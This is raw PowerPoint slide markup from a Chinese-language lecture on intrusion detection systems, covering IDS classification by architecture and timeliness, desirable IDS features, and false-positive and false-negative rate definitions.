          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4010660" y="4718050"/>
            <a:ext cx="2118360" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="3336" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="201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混合型</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11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="150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14" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846955" y="5269865"/>
            <a:ext cx="6513195" cy="62801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fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测系统获取数据的依据二者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>兼而有之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE62FC53-321E-45DA-BE07-21B31568C4C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.3 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分类</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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1417955"/>
            <a:ext cx="569404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依据体系结构和模块运行方式分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="1982470"/>
            <a:ext cx="3820160" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="6016" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="469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集中式入侵检测系统</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4" name="组合 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="150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0"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1" name="组合 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4010660" y="2600325"/>
            <a:ext cx="3818890" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="6014" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="469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分布式入侵检测系统</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33" name="组合 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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5"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19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424940" y="2118360"/>
            <a:ext cx="2193925" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4022725" y="4095750"/>
            <a:ext cx="4642485" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7311" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="5992"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脱机分析型入侵检测系统</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11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="150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sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="3521075"/>
            <a:ext cx="569404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依据时效性分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4030980" y="4643755"/>
            <a:ext cx="4642485" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7311" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="5992"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sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>联机分析型入侵检测系统</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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{531F2BC5-2AB3-4559-AC7F-74F952DB3FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.3 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分类</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1097280" y="4232910"/>
            <a:ext cx="3011805" cy="1692275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1484630" y="1709420"/>
            <a:ext cx="1823720" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="2872" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="164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功能</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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7"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41" name="组合 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1485265" y="2399030"/>
            <a:ext cx="1823720" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="2872" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="164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性能</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="组合 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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5"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6" name="组合 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1484630" y="3122295"/>
            <a:ext cx="2505075" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="3945" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="27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可用性</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="组合 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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0"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56" name="组合 55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4432300" y="2010410"/>
            <a:ext cx="6865620" cy="3529330"/>
            <a:chOff x="6827" y="3132"/>
            <a:chExt cx="10812" cy="5558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="AutoShape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6827" y="3132"/>
              <a:ext cx="10708" cy="5559"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng">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endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="TextBox 137"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7125" y="3644"/>
              <a:ext cx="5082" cy="4482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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先进的检测能力和响应能力</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不影响被保护网络正常运行</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无人监管能正常运行</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具有坚固的自身安全性</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具有很好的可管理性</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消耗系统资源较少</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可扩展性好，能适应变化。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" indent="0">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buBlip>
                  <a:blip r:embed="rId5"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>支持</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>碎片重组</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="140" name="TextBox 139"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12187" y="3532"/>
              <a:ext cx="5452" cy="4532"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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支持</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>流重组</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRP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支持</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>状态检测</a:t>
              </a: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支持应用层协议解码</a:t>
              </a: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灵活的用户报告功能</a:t>
              </a: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安装、配置、调整简单易行</a:t>
              </a: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能与常用的其他安全产品集成</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" indent="0">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buBlip>
                  <a:blip r:embed="rId5"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>支持常用网络协议和拓扑结构</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F718F6-9CFC-42D5-A8DE-A285C32DB3AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.4 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评价标准</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1099064" y="4232910"/>
            <a:ext cx="3011805" cy="1692275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1484630" y="1874938"/>
            <a:ext cx="6005195" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="9457" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="822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误报 </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>(false positive)——</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>假阳性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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7"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41" name="组合 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1485265" y="2751579"/>
            <a:ext cx="6946265" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="10939" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="970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漏报 </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>(false negative)——</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>假阴性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="组合 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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5"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7" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152931" y="4069239"/>
            <a:ext cx="6078186"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误报</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>率 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>误报事件数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>事件数总量</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152931" y="4962873"/>
            <a:ext cx="6078186"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漏报</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>率 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏报事件数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>事件数总量</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B86DAFFA-0F44-4627-91F8-813399B4C77F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.4 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评价标准</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7FE56C7-A938-4AC0-8C8B-98AE9D55AB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="1620000"/>
            <a:ext cx="5923434" cy="660250"/>
